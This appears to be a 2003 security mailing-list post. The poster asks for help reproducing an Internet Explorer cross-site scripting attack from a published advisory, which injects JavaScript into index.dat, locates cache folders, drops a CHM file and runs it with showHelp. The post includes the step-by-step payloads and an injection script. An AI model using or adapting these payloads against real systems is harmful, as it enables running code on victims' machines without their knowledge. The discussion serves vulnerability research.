Testing Cross-Site Scripting to Inject and run malicious code

From: Indian Tiger (indiantigerat_private)
Date: Sat Apr 12 2003 - 08:41:45 PDT


    Hi All,
    
    I am testing Cross-Site Scripting to inject and run malicious code. I was 
    following Georgi Guninski’s advisory, which was published on 23 November 
    2000.
    
    Following this advisory, I am trying to inject a malicious file onto the victim’s 
    machine and then run that injected file.
    
    According to this advisory, we have to perform the following four steps to inject 
    a file and run it.
    
    1) Inject JavaScript into “index.dat” by 
    window.open("http://somehost/index.html?>JSCODE</SCRIPT>"). The 
    JavaScript is executed in index.dat and has access to its content, which allows 
    finding the random directory names.
    
    2) Parse/render index.dat by: <OBJECT DATA="file://C:/WINDOWS/Temporary 
    Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 
    HEIGHT=200></OBJECT>
    
    
    3) After the Temporary Internet Files folders are known, inject for example chm 
    files by: <OBJECT DATA="chm1.chm" TYPE="text/html"></OBJECT>
    
    4) Do window.showHelp("FOUNDRANDOMDIRECTORY\\chm1[1].chm");
    
    I am clear up to the second step he has specified, but I am not clear about the 
    third and fourth stages. The third stage is going to inject the chm1.chm file onto 
    the victim’s machine, but it is not clear whether this file is located on the 
    victim’s machine or the attacker’s machine. Also, where will this file be stored on 
    the victim’s machine? This step also doesn’t use the names of the random directories 
    we found in the 2nd step, so I don’t know why the second step is required, or 
    how we can write JavaScript to find the random folders from the “index.dat” file.
    
    The code for injecting JavaScript into index.dat and displaying the content of the 
    index.dat file is given as:
    <SCRIPT> 
    b=window.open("http://10.10.10.10?>a=window.open();a.document.body.innerHTML=escape(document.body.innerHTML)</"+"SCRIPT>"); 
    s='<OBJECT DATA="file://C:/WINDOWS/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>'; 
    setTimeout("document.writeln(s)",10000); 
    </SCRIPT>
    
    This code should return the output of the index.dat file into a new blank window, 
    but when I tried this I didn’t get the output of index.dat in a new window; 
    instead, I got the output of index.dat in the same window in which I had written 
    this code.
    
    I think that to run the JavaScript stored in the index.dat file, we first need to 
    create an object that captures all the contents of the index.dat file, and then 
    create a new window and assign its “Inner HTML Code” to the contents of that 
    object. I don’t know whether this makes sense or not, but I am trying to do 
    something like that.
    
    Any Help on the above topics will be highly appreciated.
    
    Thanking You,
    Sincerely,
    
    Indian Tiger, CISSP
    
    
    



    This archive was generated by hypermail 2b30 : Sat Apr 12 2003 - 13:26:29 PDT